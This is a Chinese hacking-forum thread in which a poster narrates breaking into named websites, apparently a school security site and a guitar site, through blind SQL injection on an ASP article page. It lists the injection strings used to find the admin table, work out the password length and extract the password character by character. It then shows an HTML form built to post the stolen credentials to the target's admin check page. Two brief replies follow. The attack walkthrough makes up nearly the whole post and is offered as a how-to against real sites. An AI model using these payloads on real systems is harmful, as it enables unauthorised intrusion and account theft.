|
 | 作者: haixiao [haixiao]
 论坛用户 |
登录 |
| 为了能在其它版发贴,将在安焦发的拿过来了!别误会!写的很菜! 小弟跟各位一样还是菜鸟,写篇文章和各位交流一下,千万别拿香蕉砸我!(呵呵!,用鸡蛋就行了!),还希望高手不要嘲笑哦! 就以我校的<a href=\'http://www.safwind\' target=\'_blank\'>www.safwind</a>.安全网为例。先在其页面上找有没有可利用的地方,一般 在page.asp?id=xx的地方有问题的可能性较大,找啊找,终于找到一个: /aritcle/default.asp?id=9' 返回:http:500 服务器错误; /aritcle/default.asp?id=9;返回:sql句尾发现字符; 好了,现在开始工作,我们的目标是猜出其管理系统的密码和用户名。那先得知道在 那个表里面,用以下语句:(大家经常用1=1,1=2来判断是否可以进行下面的猜测,返回不同页面则可,不一定是错误页面) aritcle/default.asp?id=9 or 0<>(select count(*) from admin),正常页面,则有个admin的表,一般情况系统密码和用户都放在这里,表名有可能改就替换admin字段不断的猜。 aritcle/default.asp?id=9 or 0<>(select count(*) from admin where username<>"")猜在admin中有username这列; aritcle/defailt.asp?id=9 or 0<>(select count(*) from admin where password <>"")猜在admin中有password这列;运气太好了,刚好是这些常见的。呵呵继续! aritcle/default.asp?id=9 and 1=(select id from admin where len(password)=7) 猜id=1密码长为7,如果正确,返回和先前一样的页面(不一定是错误消息); 我猜出密码长为8,好了,猜密码为何了; aritcle/default.asp?id=9 and 1=(select id from admin where left(password,1)='a')猜密码左边第一位是a, ................................ aritcle/default.asp?id=9 and 1=(select id from admin where left(password,1)='l')正确; aritcle/default.asp?id=9 and 1=(select id from admin where left(password,2)='lo')正确,想想lo,那接下来可以猜love了吧,如果这都想不到那就不要继续了(呵呵),终于猜出密码和用户名了(花了半个小时)现在有点兴奋了吧 现在开始找管理入口, /aritcle/admin.asp 没有; /aritcle/logon.asp 没有; /aritcle/adminlogon.asp 没有; ........ 哎,还没有,想放弃了。 想想,知道他用的是哪个管理系统就好了,突然看到qu_requir.asp,在gogle一搜 看到4个结果,看能不能从其他网搞点信息,好!继续,从这个<a href=\'http://www.seeguitar.com\' target=\'_blank\'>www.seeguitar.com</a> 入手,同样猜出密码和用户, /artcle/admin.asp 兴奋,有登陆界面,进去是发现是chkadmin.asp来检查的,好,估计先前的网站删了admin.asp ,自己构造一个就行了,胜利在望! <table width="400" height="200"> <form name="ruqin" method="post" action="http://safewind.dlmu.edu.cn/aritcle/chkadmin.asp"> user <input type="text" name="username"> password <input type="text" name="password"> <input type="submit" name="Submit" value="send"> </form> </table> 好了,结束了,进去看一看,给管理员发个信息,退出。 其实也走了弯路,应该猜到是动网管理系统,根据manage.asp管理页面以及其他的信息,不过聪明的会改掉这些默认的名字。 [此贴被 haixiao(haixiao) 在 12月03日20时29分 编辑过] |
| 地主 发表时间: 12/03 19:35 |
 | 回复: hzyboy [hzyboy] 论坛用户 |
登录 |
|
不明白 |
| B1层 发表时间: 04-01-10 01:02 |
 | 回复: zybzc [zybzc]  论坛用户 |
登录 |
|
好眼熟啊 你写的? 现在能成功不 ? 热浪早过了 不是很菜的网管 这么简单的 应该是搞不定了 |
| B2层 发表时间: 04-01-10 03:20 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 菜鸟乐园 标题: sql+asp的简单入侵